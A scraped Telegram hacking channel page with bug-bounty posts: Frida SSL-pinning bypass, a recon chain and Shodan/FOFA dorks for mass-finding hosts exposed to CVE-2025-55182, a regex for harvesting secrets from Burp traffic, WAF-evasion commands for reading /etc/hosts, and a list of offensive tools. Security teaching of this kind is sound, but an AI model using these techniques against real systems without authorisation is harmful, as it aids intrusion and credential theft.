Hacking Vidhya
Ir al canal en Telegram
We Talk about : Hacking , CTFs , Pentesting , Red & Blue Team etc. Not Allowed: Selling, Carding, Cracking Crypto.
Mostrar más385
Suscriptores
+224 horas
+47 días
+2430 días
Archivo de publicaciones
↳ Setting Up Android Emulator using Burp Suite and Android Studio and Bypass SSL Pinning
Today, I tried setting up an Android emulator to capture app traffic through Burp Suite. At first, I used Genymotion, which offers a free 30-day trial. However, it’s quite buggy! and after the trial, you either need to pay or reinstall it. So, I switched to Android Studio, which turned out to be a better option.
After installing Android Studio, I discovered an easier way to install Burp’s certificate using rootAVD.
Just follow the installation steps from the github page.
If you get stuck, this YouTube video helps a lot:
Installing (AND ROOTING) Android Emulator
💡Tip: If the emulator freezes, restart it using Cold Boot.
Once rootAVD is set up, install the AlwaysTrustUserCerts Magisk module. It allows your emulator to trust Burp Suite’s certificate automatically.
At this point, Burp can capture traffic but not everything, because some apps use SSL pinning. To bypass SSL pinning, use Frida.
There’s another great video that explains how to set up both AlwaysTrustUserCerts and Frida:
Burp Suite and Frida on an Android Emulator
💡Tip: Again, use Cold Boot if your device gets stuck.
After setup, start Frida on the emulator via ADB shell:
./frida-server
Then, on your computer, list all running app processes:
frida-ps -Uia
Find the package name of the app you want to hook, then run this command to bypass SSL pinning:
frida --codeshare akabe1/frida-multiple-unpinning -f com.identifier.name -U
And that’s it! Now you can capture and intercept HTTPS traffic from your Android apps using Burp Suite.I HAVE NOT DONE THIS, SOMEONE ELSE DID IT: jUST SHARING WITH COMMUNITY>
⚡️ THE MASTER POST — React2Shell (CVE-2025-55182) Full-Spectrum Recon Chain
🔥 “Everyone is scanning for CVE-2025-55182 wrong.
Here’s the methodology I use to identify high-impact React2Shell surfaces across global attack footprints…”
# 1️⃣ Wildcard → Recursive Surface Explosion (Deep Enumeration)
subfinder -dL wildcards.txt -all -recursive -t 200 \
| anew subs_raw.txt
# 2️⃣ Intelligent Asset Profiling (Framework + Build Meta)
httpx -l subs_raw.txt -tech-detect -title -favicon -server \
-mc 200,301,302 \
| grep -Ei "react|next|rsc|flight" \
| anew tech_filtered.txt
# 3️⃣ JavaScript Supply Chain Fingerprint Sweep
katana -uL tech_filtered.txt -d 6 -js-crawl -kf all \
-silent \
| grep -Ei "server-reference-manifest|actionManifest|RSC|flight-data" \
| anew js_core_exposed.txt
# 4️⃣ Historical Endpoint Correlation (Deep Archive Scrape)
(gau + waybackurls) >> archive.txt
uro archive.txt | grep -Ei "render|api|ssr|_next" \
| anew archive_ssr.txt
# 5️⃣ RSC Boundary Integrity Audit
nuclei -t CVE-2025-55182.yaml -l final_targets.txt \
-severity critical \
-silent
🌐 Search Engine Recon Fingerprints
(These are not the usual “app=React.js” beginners use — these are tuned for React2Shell attack-surface archaeology.)
FOFA
vul.cve="CVE-2025-55182"
&& (header="rsc-action" body="RSC" app="Next.js" || app="React.js")
&& asn="YOUR_ASN"
Shodan
http.component:"Next.js"
OR http.waf.name!="Cloudflare"
OR http.html:"RSC"
OR ssl:"react"
ZoomEye
(title:"Next.js" body:"react.production.min.js" header:"x-nextjs-data")
AND (product:"React" product:"Next.js")
🧠 ADVANCED CONTEXT — WHY THIS WORKS
Most researchers stop after “scan subdomains → run nuclei.”
React2Shell requires vulnerability archaeology, not basic scanning.
This pipeline does what nobody else is doing:
✅ Detects exposed React Server Component artifacts
(server-boundary-props, flight-data, actionManifest)
✅ Correlates historic endpoints to modern builds
Wayback + GAU reveals legacy SSR handlers still wired internally.
✅ Tech-detect fingerprinting picks up misconfigured Next.js “hybrid apps”
(Static + RSC + legacy SSR mixed incorrectly)
✅ Filters out false positives using multi-layer asset classification
✅ Scales to entire ASNs, cloud regions, and enterprise attack surfaces
This is the closest thing to AI-augmented CVE reconnaissance you can do without running exploit code.
🚀 🔥 CVE-2025-55182 | React2Shell Attack Surface Mapping (Advanced Edition)
Everyone’s scanning wrong.
Here’s how I map entire enterprise footprints for React2Shell exposure 👇
subfinder -dL wildcards.txt -all -recursive > subs.txt
httpx -l subs.txt -tech-detect | grep -Ei "react|next" > react.txt
katana -uL react.txt -d 6 -js-crawl > js.txt
(gau + waybackurls) >> archive.txt
nuclei -t CVE-2025-55182.yaml -l react.txt
FOFA:
vul.cve="CVE-2025-55182" && (header="rsc-action" body="RSC")
Shodan:
http.component:"Next.js" OR http.html:"RSC"
ZoomEye:
title:"Next.js" AND product:"React"
⚡️ Hunt Sensitive Credentials in Burpsuite requests
A good Regex for finding API Keys, Access tokens and sensitive data in requests aggregated in Burpsuite
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_key|cloudinary_api_secret|cloudinary_name|codecov_token|config|conn.login|connectionstring|consumer_key|consumer_secret|credentials|cypress_record_key|database_password|database_schema_test|datadog_api_key|datadog_app_key|db_password|db_server|db_username|dbpasswd|dbpassword|dbuser|deploy_password|digitalocean_ssh_key_body|digitalocean_ssh_key_ids|docker_hub_password|docker_key|docker_pass|docker_passwd|docker_password|dockerhub_password|dockerhubpassword|dot-files|dotfiles|droplet_travis_password|dynamoaccesskeyid|dynamosecretaccesskey|elastica_host|elastica_port|elasticsearch_password|encryption_key|encryption_password|env.heroku_api_key|env.sonatype_password|eureka.awssecretkey)[a-z0-9_ .\-,]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z\-_=]{8,64})['\"]
🔠🔠🔠
🔠🔡🔡🔡🔡🔡
⚡️Bypass Series for bug hunters😎
⚡️ Part-1
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
tac /etc/hosts - 🧙♂️
man /etc/hosts - 😎
nl /etc/hosts - 🤯
less /etc/hosts - 🤫
more /etc/hosts - 👍
strings /etc/hosts - 🤣
tail /etc/hosts - 😅
head /etc/hosts -🤕
⚡️Part-2
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
xxd -p /etc/hosts | xxd -p -r
xargs -d '\n' -I{} echo {} < /etc/hosts
perl -pe '' /etc/hosts
sed '' /etc/hosts
awk '{print}' /etc/hosts
dd if=/etc/hosts 2>/dev/null
⚡️Part-3
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
cat < /etc/hosts
cat /proc/self/fd/0 < /etc/hosts
cat /etc/hosts | base64 | base64 -d
cat /etc/hosts | string collect
cat /etc/hosts | while read line; echo $line; end
echo (cat /etc/hosts)
⚡️Part-4
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
rev /etc/hosts | rev
od -An -c /etc/hosts | tr -d ' '
cat $HOME/../../etc/hosts
cat ${PWD}/../../../etc/hosts
grep "" /etc/hosts
cut -c1- /etc/hosts
paste /etc/hosts
Half of the internet is down again due to the ongoing Cloudflare incident.
"Cloudflare is investigating issues with Cloudflare Dashboard and related API
⚙️ Complete Bug Bounty tool List ⚙️
Enjoy :)
dnscan https://github.com/rbsec/dnscan
Knockpy https://github.com/guelfoweb/knock
Sublist3r https://github.com/aboul3la/Sublist3r
massdns https://github.com/blechschmidt/massdns
Nmap https://nmap.org
Masscan https://github.com/robertdavidgraham/masscan
EyeWitness https://github.com/ChrisTruncer/EyeWitness
DirBuster https://sourceforge.net/projects/dirbuster/
dirsearch https://github.com/maurosoria/dirsearch
Gitrob https://github.com/michenriksen/gitrob
git-secrets https://github.com/awslabs/git-secrets
sandcastle https://github.com/yasinS/sandcastle
bucket_finder https://digi.ninja/projects/bucket_finder.php
GoogD0rker https://github.com/ZephrFish/GoogD0rker/
Wayback Machine https://web.archive.org
waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050
Sn1per https://github.com/1N3/Sn1per/
XRay https://github.com/evilsocket/xray
wfuzz https://github.com/xmendez/wfuzz/
patator https://github.com/lanjelot/patator
datasploit https://github.com/DataSploit/datasploit
hydra https://github.com/vanhauser-thc/thc-hydra
changeme https://github.com/ztgrace/changeme
MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/
Apktool https://github.com/iBotPeaches/Apktool
dex2jar https://sourceforge.net/projects/dex2jar/
sqlmap http://sqlmap.org/
oxml_xxe https://github.com/BuffaloWill/oxml_xxe/
XXE Injector https://github.com/enjoiz/XXEinjector
The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool
ground-control https://github.com/jobertabma/ground-control
ssrfDetector https://github.com/JacobReynolds/ssrfDetector
LFISuit https://github.com/D35m0nd142/LFISuite
GitTools https://github.com/internetwache/GitTools
dvcs-ripper https://github.com/kost/dvcs-ripper
tko-subs https://github.com/anshumanbh/tko-subs
HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer
Race the Web https://github.com/insp3ctre/race-the-web
ysoserial https://github.com/GoSecure/ysoserial
PHPGGC https://github.com/ambionics/phpggc
CORStest https://github.com/RUB-NDS/CORStest
Retire-js https://github.com/RetireJS/retire.js
getsploit https://github.com/vulnersCom/getsploit
Findsploit https://github.com/1N3/Findsploit
bfac https://github.com/mazen160/bfac
WPScan https://wpscan.org/
CMSMap https://github.com/Dionach/CMSmap
Amass https://github.com/OWASP/Amass
Extra Tools
http://projectdiscovery.io
API Pentesting Series — Part 7
Before you attack APIs, you need a solid lab.
This part covers:
• Tooling (Burp, DevTools, Postman)
• Discovery tools (Kiterunner, Nikto)
• Docker-based vulnerable APIs
• Full environment setup
Notion Notes 🔗: https://notion.so/aacle/PART-7-API-PenTesting-Series-LAB-SETUP-2b9f7b9ea30e809f8e8ddc938eb0fb1a
